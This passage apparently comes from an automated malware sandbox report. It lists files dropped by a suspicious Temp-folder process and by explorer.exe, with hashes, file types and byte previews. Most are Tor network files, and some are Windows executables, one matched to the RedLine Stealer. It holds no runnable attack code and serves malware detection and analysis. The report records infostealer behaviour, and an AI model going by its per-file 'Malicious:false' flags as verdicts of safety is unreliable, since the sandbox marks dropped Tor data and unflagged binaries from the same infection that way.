                                                                                                                                                                                                                                                                                                                                Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2023-05-17 14:30:40..dir-key-expires 2024-05-17 14:30:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvIW/KEA4eoi2rkD6vDKcLu2+2DY5K3pd9P5edSvQ8mBY21CeUfhY..WI+XWr1K9U5/yNsJS8YCvGEtvNK+yEnHkBKLItvi6ibv6W8nP5l4sLhooJBaPm7v..FDhtbnp6HTMbSnBXTxT2gaSPJ+p9
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2864217
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.612110416259099
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:/vsOq1OVpESRnFXzcYSgkHuWW8GhPJQ5TIa8bu5wtudjwhmgpZ/RNwREX+49rL4z:/DqAVXNF1SF9GhPmJI2Muw8CRpzrL4dh
                                                                                                                                                                                                                                                                                                                                MD5:6DC0DD8852D2BB859742A0CD8535D6C0
                                                                                                                                                                                                                                                                                                                                SHA1:28C0DDEFFD109C7C6F4D207443B46691B7FF5A82
                                                                                                                                                                                                                                                                                                                                SHA-256:2DE7DC988EB101321D68AE3FA3C65BD2D31A4054328C90A120D34BFAAF1D4A85
                                                                                                                                                                                                                                                                                                                                SHA-512:E23C327101B638B44423DCCBC39E349EB56804BE02FE8766C6F9A681010FEFD5722EA4EE49B54845BA0AA14846116861FF483372F94AF630CB7DA3E14C8477D1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-21 03:00:00.fresh-until 2023-12-21 04:00:00.valid-until 2023-12-21 06:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (346), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4234
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.28244644410664
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:EZ511CfeWSlBMVvQArKknVz39Io9t0QsfRkW:3fLvf+SpzY
                                                                                                                                                                                                                                                                                                                                MD5:4BB7ED8EE196B8DCC81E5B8CA3F3F0EF
                                                                                                                                                                                                                                                                                                                                SHA1:6AC7FFF269E4E82B42D06A5D432045C5F5BB56DF
                                                                                                                                                                                                                                                                                                                                SHA-256:DAB14672E170255D3E978F7A89CFCA4EC5C3B0DF981A2A6DA35890D7783AB5E4
                                                                                                                                                                                                                                                                                                                                SHA-512:73435FC1C0AFC2A55F23B69AF4B1D0C018D29E815C3BDB71FE6CC19290909CD710E8797B10E0D74AF7A8065340B80E365FCA93C44E8685CBC542834D09313F78
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2023-12-21 05:04:44 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 825 3..CircuitBuildTimeBin 975 2..CircuitBuildTimeBin 1075 1..CircuitBuildTimeBin 1225 1..CircuitBuildTimeBin 1275 1..CircuitBuildTimeBin 1325 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 2775 1..CircuitBuildTimeBin 16425 1..CircuitBuildTimeBin 16825 1..Dormant 0..Guard in=default rsa_id=9E806C33AEB62CF2893B0F85D5A810D78ADEA51F nickname=Unnamed sampled_on=2023-12-19T15:11:15 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-12-09T12:58:43 confirmed_idx=0 pb_use_attempts=3.000000 pb_use_successes=3.000000 pb_circ_attempts=6.000000 pb_circ_successes=5.000000 pb_successful_circuits_closed=5.000000..Guard in=default rsa_id=E4B0CAD11B5487C46293759A3D4B74484CF93509 nickname=fusion sampled_on=2023-12-10T18:49:00 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-12-20T16:13:47 confi
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2864217
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.612110416259099
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:/vsOq1OVpESRnFXzcYSgkHuWW8GhPJQ5TIa8bu5wtudjwhmgpZ/RNwREX+49rL4z:/DqAVXNF1SF9GhPmJI2Muw8CRpzrL4dh
                                                                                                                                                                                                                                                                                                                                MD5:6DC0DD8852D2BB859742A0CD8535D6C0
                                                                                                                                                                                                                                                                                                                                SHA1:28C0DDEFFD109C7C6F4D207443B46691B7FF5A82
                                                                                                                                                                                                                                                                                                                                SHA-256:2DE7DC988EB101321D68AE3FA3C65BD2D31A4054328C90A120D34BFAAF1D4A85
                                                                                                                                                                                                                                                                                                                                SHA-512:E23C327101B638B44423DCCBC39E349EB56804BE02FE8766C6F9A681010FEFD5722EA4EE49B54845BA0AA14846116861FF483372F94AF630CB7DA3E14C8477D1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-21 03:00:00.fresh-until 2023-12-21 04:00:00.valid-until 2023-12-21 06:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):16296
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.052124604275745
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:cMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVf1hc1xc2q48XVd91hMBf/40VV5:6BkoicOaqyrqvUg62M1ux8nX98HJiO9b
                                                                                                                                                                                                                                                                                                                                MD5:CEABBEDFBCCF9E5F4CE2ABD3574C913F
                                                                                                                                                                                                                                                                                                                                SHA1:B8F01C314D9A0A5E7FFF4A9C97B70B10999BA298
                                                                                                                                                                                                                                                                                                                                SHA-256:0200A2C44BE41F5366AF708CF3DA47F82C6E3AD5B525A8BB00B14C65C213B0C1
                                                                                                                                                                                                                                                                                                                                SHA-512:F00E78FA65E57366AA1492972DB6E972C16BF658E8AAE2497A586C822400EF40B6C3D9B866C64FFFB9A3978A5A156FD8DE0B1EBC3B1C3F16F7D8AF521C8355A0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2023-05-17 14:30:40..dir-key-expires 2024-05-17 14:30:40..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvIW/KEA4eoi2rkD6vDKcLu2+2DY5K3pd9P5edSvQ8mBY21CeUfhY..WI+XWr1K9U5/yNsJS8YCvGEtvNK+yEnHkBKLItvi6ibv6W8nP5l4sLhooJBaPm7v..FDhtbnp6HTMbSnBXTxT2gaSPJ+p9
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2864217
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.612110416259099
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:/vsOq1OVpESRnFXzcYSgkHuWW8GhPJQ5TIa8bu5wtudjwhmgpZ/RNwREX+49rL4z:/DqAVXNF1SF9GhPmJI2Muw8CRpzrL4dh
                                                                                                                                                                                                                                                                                                                                MD5:6DC0DD8852D2BB859742A0CD8535D6C0
                                                                                                                                                                                                                                                                                                                                SHA1:28C0DDEFFD109C7C6F4D207443B46691B7FF5A82
                                                                                                                                                                                                                                                                                                                                SHA-256:2DE7DC988EB101321D68AE3FA3C65BD2D31A4054328C90A120D34BFAAF1D4A85
                                                                                                                                                                                                                                                                                                                                SHA-512:E23C327101B638B44423DCCBC39E349EB56804BE02FE8766C6F9A681010FEFD5722EA4EE49B54845BA0AA14846116861FF483372F94AF630CB7DA3E14C8477D1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-21 03:00:00.fresh-until 2023-12-21 04:00:00.valid-until 2023-12-21 06:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (12354)
                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                Size (bytes):22185200
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.814843501632569
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:fSq2m91wbYi9qsI1OdNUVtQYWU4B/sBWEqpnY8Kg2qHE5o1/KwnVG8ET/Wf5cLow:sOVoXpou8AXn0+1m431PFDa
                                                                                                                                                                                                                                                                                                                                MD5:D839BCF3B306729A7C55B00A2925E172
                                                                                                                                                                                                                                                                                                                                SHA1:8F00C40248DA4337A6BB5C08CC976AE9C3CDB75C
                                                                                                                                                                                                                                                                                                                                SHA-256:D665220A7E103118BCB85C61232BA7DF32AEDE25435A0A68207A5ACA956916D0
                                                                                                                                                                                                                                                                                                                                SHA-512:B86DD56780E09FE47B292C54D476D3E06974564B094228F64BE6F4731CC77EFF4C414D62AB469023F2E8AAAC928C25640C1BCB5F89B16DC322339A5673763050
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:@last-listed 2023-12-21 04:02:43.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALViJIiI6ndKfaRNwe9iBScAYloulpdZEG04jbmmyCCUtmyf/K7iaA80.dCoNgkzOpdH62c6rYoz+AjlCEwO/DHN1fC6Xv2BVYUZInHEi2XcrLV2b4XzRYvxn.yQ6q9xn8AQV01M1qSK1hp8sYCIQLk59sMGcgtlx2g88YOoxnL123AgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key cZ1W8fhoTuNcOUXboyd/Xu/6jY4lC+kU7Gbj1eiRpn4.id ed25519 TDTzAZTXIcV+uEl7P6gEgmu1RvUSYzuMxwxV+eWyFno.@last-listed 2023-12-21 04:02:43.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMxwMayyAhl/1mYZ2bS4uY2t9Zqk30+0drLU9BT+c3NlyhfBG1cH7ger.z4/HREWtdVl2xAiwj64Zg/LF3Tqky/BpkWh3Sx93FKJppUSmB790922Qf/sCc+lY.ppnBDZ5QFeq3nypYqEesrq8HWnwFCgOaZY32zFLK8m9xFIemnn8XAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key 01SIuITQ717lvnJTJJoRESLXzYaq7sQKacVT9m//IgI.family $004F9A0513C84E72054CEB555DB51EEEF319546D $0055DB090820D7C08999EC1598FD6EA6365861AD $008F10F88397C11C062217EAC35D782F03BDF4C7 $009EF5F8572D671AFCBBAD65998BA35B50EE04BC $00BD33C25A006BA95103D3E8043FA7EF1E2BCA6C $00FB85B65AC2F460CD46A
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (346), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4234
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.28244644410664
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:EZ511CfeWSlBMVvQArKknVz39Io9t0QsfRkW:3fLvf+SpzY
                                                                                                                                                                                                                                                                                                                                MD5:4BB7ED8EE196B8DCC81E5B8CA3F3F0EF
                                                                                                                                                                                                                                                                                                                                SHA1:6AC7FFF269E4E82B42D06A5D432045C5F5BB56DF
                                                                                                                                                                                                                                                                                                                                SHA-256:DAB14672E170255D3E978F7A89CFCA4EC5C3B0DF981A2A6DA35890D7783AB5E4
                                                                                                                                                                                                                                                                                                                                SHA-512:73435FC1C0AFC2A55F23B69AF4B1D0C018D29E815C3BDB71FE6CC19290909CD710E8797B10E0D74AF7A8065340B80E365FCA93C44E8685CBC542834D09313F78
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2023-12-21 05:04:44 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 825 3..CircuitBuildTimeBin 975 2..CircuitBuildTimeBin 1075 1..CircuitBuildTimeBin 1225 1..CircuitBuildTimeBin 1275 1..CircuitBuildTimeBin 1325 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 2775 1..CircuitBuildTimeBin 16425 1..CircuitBuildTimeBin 16825 1..Dormant 0..Guard in=default rsa_id=9E806C33AEB62CF2893B0F85D5A810D78ADEA51F nickname=Unnamed sampled_on=2023-12-19T15:11:15 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-12-09T12:58:43 confirmed_idx=0 pb_use_attempts=3.000000 pb_use_successes=3.000000 pb_circ_attempts=6.000000 pb_circ_successes=5.000000 pb_successful_circuits_closed=5.000000..Guard in=default rsa_id=E4B0CAD11B5487C46293759A3D4B74484CF93509 nickname=fusion sampled_on=2023-12-10T18:49:00 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-12-20T16:13:47 confi
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2864217
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.612110416259099
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12288:/vsOq1OVpESRnFXzcYSgkHuWW8GhPJQ5TIa8bu5wtudjwhmgpZ/RNwREX+49rL4z:/DqAVXNF1SF9GhPmJI2Muw8CRpzrL4dh
                                                                                                                                                                                                                                                                                                                                MD5:6DC0DD8852D2BB859742A0CD8535D6C0
                                                                                                                                                                                                                                                                                                                                SHA1:28C0DDEFFD109C7C6F4D207443B46691B7FF5A82
                                                                                                                                                                                                                                                                                                                                SHA-256:2DE7DC988EB101321D68AE3FA3C65BD2D31A4054328C90A120D34BFAAF1D4A85
                                                                                                                                                                                                                                                                                                                                SHA-512:E23C327101B638B44423DCCBC39E349EB56804BE02FE8766C6F9A681010FEFD5722EA4EE49B54845BA0AA14846116861FF483372F94AF630CB7DA3E14C8477D1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-21 03:00:00.fresh-until 2023-12-21 04:00:00.valid-until 2023-12-21 06:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1974784
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9356162031894995
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:Qe6RRRpEHQN/ThQrezxMQnXW8qaJZkRLagEoH6gFt:Q9nLEcrhhmYLwpbE+t
                                                                                                                                                                                                                                                                                                                                MD5:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                SHA1:5B8B55DC12217EB37BD25CA61CD7ACEEC729E603
                                                                                                                                                                                                                                                                                                                                SHA-256:2CDC39F39A9369AE4062822EA6726F2E508D5D29514B3CEE06F809CE6EF16250
                                                                                                                                                                                                                                                                                                                                SHA-512:99A4C6612DE866F966F2B9F84C16ADA59D3606DB942011D720DEBE12F4B059A9AEC1B7C1046231B15AE728B6A27E616056588680AA3EBCBF0340A4D6EEDDB9B2
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L.....Yc.................T....D......>.......p....@..........................@`......l..........................................<.....^.X|...........................q..................................@............p...............................text...rS.......T.................. ..`.rdata...3...p...4...X..............@..@.data...|.B.........................@....rsrc...X|....^..~..................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8885269
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.914736904189853
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:196608:EgJCU/9onJ5hrZEce9tGPqKM48RmU/3ZlsPv4TbOTvN8CsnHC:VJj9c5hlEiPNMtN3ZW43OTqi
                                                                                                                                                                                                                                                                                                                                MD5:033576B4B54E5CB69EC8491FF6624C9F
                                                                                                                                                                                                                                                                                                                                SHA1:CEA7579E77BD6814976D39A4A8B3765ACA8A36E6
                                                                                                                                                                                                                                                                                                                                SHA-256:F3451E6CC0C2C03F52BF1DD6CFBED33A43188D08B7410B189E986A91F75D6F7E
                                                                                                                                                                                                                                                                                                                                SHA-512:3ACCECD939419E88CB7267D9563A80679B07804DFC71924F8523D28A098515E105E48B9D315504CD85BDA993FD5BA62BE2F1851037057E36B531EA56C07BDA9B
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........r...r...r...q...r...w.'.r...v...r.<.....r.<.w...r.<.v...r.<.q...r...s...r...s...r...v...r...p...r.Rich..r.........................PE..d......e.........."....$............@..........@.....................................9....`....................................................x.... .......... ..............X...................................@...@............................................text...0........................... ..`.rdata...*.......,..................@..@.data...............................@....pdata... ......."..................@..@_RDATA..\...........................@..@.rsrc....... ......................@..@.reloc..X...........................@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2330624
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.948940402614378
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:mMmEM3f7iyA6v1XRazWPSzi+fpFH0hiFRpr2y+R6jvUuMXcBHJ:tePAC1XRazWPSDpp0oRUy+R6rUuM+
                                                                                                                                                                                                                                                                                                                                MD5:C3A89329ABD97853E90AC21A858396AD
                                                                                                                                                                                                                                                                                                                                SHA1:B2DD9291CD350ADAFF5D077402D661234CCA6279
                                                                                                                                                                                                                                                                                                                                SHA-256:20877D32BE96713D0281AD914814E36B9F6C44C2FA25AA5441BE5E91EFBFC4B9
                                                                                                                                                                                                                                                                                                                                SHA-512:0ADB40A5162A8765FD207BF8557699C879CC2C70A1C6C1DE64FAB479A4753354ED37552611E326002392EE9BF35C9444203EDB959289ECA11CFFDC4780A837B9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nt.j...j...j...M.b.-...j...9......~...Ox..e.......T.............../......."...q...1....Q......k..Y...Richj...............PE..L....=)G...........!.....0....,..F...........@................................#............@........................(........[........#.......................#.<q...@...............................................@..x............................text...`+.......0..................9..`.rdata.......@... ...@..............@..@.data........`.......`..............@....code........ ......................@....rsrc.........#......."................@.reloc........#.......#.............@..B....................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4765600
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):6.944483011133724
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:98304:IfCOrHQms2QJmu6eonAh3EX5hKMrBA7dLV:8C0H82Q03n+3EX5ltWdp
                                                                                                                                                                                                                                                                                                                                MD5:62C9E15DD99C7D3B7367DCF220579C54
                                                                                                                                                                                                                                                                                                                                SHA1:A735B0E57F0F013592A55675220E5F4D7C093F78
                                                                                                                                                                                                                                                                                                                                SHA-256:F0031FCA754E1E01DB4BA9D8DF732CABFD34117B136F8E44D5869D6F727C3930
                                                                                                                                                                                                                                                                                                                                SHA-512:B6384B4A6B3C6CB757E89110D7B3A23F8D8E056A12E515E3C156DB5B97E09C0E53831E3BDC0BAD121D8C661E8E26A6992710F23EC6FFA5464516366081095E09
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\B013.exe, Author: Joe Security
